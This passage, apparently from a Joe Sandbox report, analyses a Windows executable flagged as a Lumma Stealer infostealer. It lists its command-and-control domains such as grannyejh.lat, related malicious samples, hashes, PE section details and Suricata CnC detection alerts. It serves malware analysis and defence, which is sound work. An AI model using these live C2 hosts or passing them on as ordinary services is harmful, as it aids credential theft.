                    NameMaliciousAntivirus DetectionReputation
                    necklacebudi.latfalse
                      		high
                      aspecteirs.latfalse
                        		high
                        energyaffai.latfalse
                          		high
                          https://grannyejh.lat/apifalse
                            		high
                            sweepyribs.latfalse
                              		high
                              sustainskelet.latfalse
                                		high
                                crosshuaht.latfalse
                                  		high
                                  rapeflowwj.latfalse
                                    		high
                                    grannyejh.latfalse
                                      		high
                                      discokeyus.latfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/chrome_newtabpPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://grannyejh.lat:443/apitApPizCGDvrx.exe, 00000000.00000003.1755353022.00000000011BE000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756627823.00000000011BF000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755109523.00000000011B1000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://duckduckgo.com/ac/?q=pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icopPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://grannyejh.lat/spPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://grannyejh.lat/pPizCGDvrx.exe, pPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1658536617.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600613999.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756651174.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671282369.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754833970.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603018790.00000000011C2000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600571554.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657853722.00000000011C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.pPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ocsp.rootca1.amazontrust.com0:pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://grannyejh.lat/HpPizCGDvrx.exe, 00000000.00000003.1547189267.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671204983.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1546879090.00000000011EC000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600571554.00000000011E8000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://www.ecosia.org/newtab/pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brpPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://grannyejh.lat/?pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001143000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://grannyejh.lat/apigsApPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://grannyejh.lat/=pPizCGDvrx.exe, 00000000.00000003.1657853722.00000000011C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://ac.ecosia.org/autocomplete?q=pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://grannyejh.lat/apiz0ypPizCGDvrx.exe, 00000000.00000002.1756296489.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755223714.0000000001158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://grannyejh.lat:443/apipPizCGDvrx.exe, 00000000.00000003.1755109523.00000000011B1000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657908110.00000000011B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.micropPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755166641.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1600613999.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1657908110.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1755109523.000000000119E000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1603058003.00000000011A0000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754892767.0000000001158000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgpPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://x1.c.lencr.org/0pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://x1.i.lencr.org/0pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://grannyejh.lat/apizpPizCGDvrx.exe, 00000000.00000003.1671204983.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://grannyejh.lat/PpPizCGDvrx.exe, 00000000.00000003.1658536617.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000002.1756651174.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1671282369.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1754833970.00000000011C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?pPizCGDvrx.exe, 00000000.00000003.1547507732.0000000005A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://grannyejh.lat/api6pPizCGDvrx.exe, 00000000.00000002.1756690646.00000000011ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&upPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9epPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgpPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://grannyejh.lat/(pPizCGDvrx.exe, 00000000.00000003.1437659594.000000000114B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://support.mozilla.org/products/firefoxgro.allpPizCGDvrx.exe, 00000000.00000003.1548557510.0000000005B72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=pPizCGDvrx.exe, 00000000.00000003.1438509200.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438578536.0000000005A9C000.00000004.00000800.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1438368607.0000000005A9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://grannyejh.lat/apiGpPizCGDvrx.exe, 00000000.00000003.1437780478.000000000115A000.00000004.00000020.00020000.00000000.sdmp, pPizCGDvrx.exe, 00000000.00000003.1437659594.0000000001158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctapPizCGDvrx.exe, 00000000.00000003.1549012644.0000000005A60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          172.67.179.109
                                                                                          		grannyejh.latUnited States
                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1577892
                                                                                          Start date and time:2024-12-18 21:15:59 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 5m 36s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:7
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:pPizCGDvrx.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:604fc7ac851c76b3ade50108357d8134.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                                          EGA Information:Failed
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 0
                                                                                          • Number of non-executed functions: 0
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target pPizCGDvrx.exe, PID 7392 because there are no executed function
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: pPizCGDvrx.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          15:17:00API Interceptor87x Sleep call for process: pPizCGDvrx.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          172.67.179.109D2Cw8gWOXj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                  0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                    Z1jUFmrTua.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      random.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            grannyejh.latD2Cw8gWOXj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 172.67.179.109
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                            • 172.67.179.109
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                                                            • 172.67.179.109
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                            • 172.67.179.109
                                                                                                            0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.179.109
                                                                                                            Lw1k8a7gQu.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.64.80
                                                                                                            Z1jUFmrTua.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.179.109
                                                                                                            random.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                            • 172.67.179.109
                                                                                                            random.exe.2.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.64.80
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                            • 104.21.64.80

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            CLOUDFLARENETUStasktow.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.1.82
                                                                                                            https://www.asda.com@hnvs.xyz/asda-christmas-prizesGet hashmaliciousUnknownBrowse
                                                                                                            • 172.66.47.201
                                                                                                            TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.24.223
                                                                                                            QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                            • 172.64.41.3
                                                                                                            Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 172.64.41.3
                                                                                                            D2Cw8gWOXj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 172.67.179.109
                                                                                                            https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                                                            • 104.17.25.14
                                                                                                            sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.220.223
                                                                                                            k6A01XaeEn.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.21.99

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.179.109
                                                                                                            D2Cw8gWOXj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 172.67.179.109
                                                                                                            sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.179.109
                                                                                                            k6A01XaeEn.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.179.109
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                            • 172.67.179.109
                                                                                                            'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.179.109
                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.179.109
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                                                            • 172.67.179.109
                                                                                                            F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                            • 172.67.179.109

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            No created / dropped files found

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):7.948078874388594
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:pPizCGDvrx.exe
                                                                                                            File size:1'871'360 bytes
                                                                                                            MD5:604fc7ac851c76b3ade50108357d8134
                                                                                                            SHA1:e8e5229df293646aed1a46d5a7d7983eb1f2eb47
                                                                                                            SHA256:a16f254d7b7ede78b181d541cf02de244472f59f18ea3c8e6ef63d869736cb93
                                                                                                            SHA512:46e45a2584f2f0c497f4ad63e03078a8a1f9c21012c273ecc1f131a1436f5883c89e6db6ee5e512b39fcec688731924a12f0e13abd8c2b18ea525b565561a1a0
                                                                                                            SSDEEP:49152:rowO3hXz+/Nub30pLQv04cl/SrtHh5fB319MP+KmE64zrlS:rot3t+/gjcg046SxJ19M2OHlS
                                                                                                            TLSH:DD85334BD062EC94E76ECE31A94B23778FA2B58402C3EDB2944C6295877F7EA55F4300
                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@.......................... J......W....@.................................T0..h..

                                                                                                            File Icon

                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x89f000
                                                                                                            Entrypoint Section:.taggant
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp 00007F2A2D061D2Ah

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x2b0.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            0x10000x510000x248004924f3feadfedbeb2dc01ccecc383d3aFalse0.9974114404965754data7.978884009645504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x520000x2b00x400b1e85b1cd09caefc2d43268be72ef161False0.3603515625data5.183452444303608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            0x540000x2a90000x200d1eaaabaf13849ba2d492f46d3dd09adunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            iottbtod0x2fd0000x1a10000x1a08008e695e9e3b9eda276f58b4e868d018e8False0.9948973730117047data7.953350662894027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            ugfsaeak0x49e0000x10000x400cb73c94c8c51ec6b39a40719d8546401False0.7451171875data5.890573657276491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .taggant0x49f0000x30000x22008557a0e6c2d451755e8e53b2c94eddc6False0.06376378676470588DOS executable (COM)0.6422367121829815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_MANIFEST0x520580x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            kernel32.dlllstrcpy

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-12-18T21:17:00.797972+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.7647491.1.1.153UDP
                                                                                                            2024-12-18T21:17:00.944390+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.7646191.1.1.153UDP
                                                                                                            2024-12-18T21:17:02.473914+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.749700172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:02.473914+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700172.67.179.109443TCP
